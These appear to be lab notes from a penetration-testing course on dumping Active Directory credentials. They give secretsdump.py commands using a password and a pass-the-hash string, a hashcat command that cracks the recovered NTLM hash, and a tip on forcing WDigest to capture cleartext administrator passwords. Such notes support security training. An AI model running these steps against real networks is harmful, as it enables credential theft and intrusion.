<aside> 📌 Summary
</aside>
Once we got credentials and we knows on which machines we can use those, we can start to exploit them in order to find more credentials. That’s the dump part.
We mostly dig out hashes, and then a major part of the game will be to crack them to exploit most of them.
Once again, we can dump secrets with either password or credentials, this time with the secrectdump.py tool.
secretsdump.py ORB/lkisaka:'Password1'@10.0.0.132
secretsdump.py <administrator:@10.0.0.131> -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
<aside>
💡 Note: With older protocols like wdigest we can find passwords in clear text. A technique (a little harsh) consists of forcing it activation and waiting for an Administrator to pass by.
</aside>
Find a little more about Hashcat password cracking here Password Cracking with Hashcat
This time we’re trying to crack NTLM hashes that we just dump above. To crack it, we only need the last part of the hash (after the :.
echo '7facdc498ed1680c4fd1448319a8c04f' > localadmin.hash
hashcat localadmin.hash -m 1000 /usr/share/wordlists/rockyou.txt
<aside> 💡 Note: Cracking a password may take a while. We should ensure that the password can be cracked and is worth the shot.
</aside>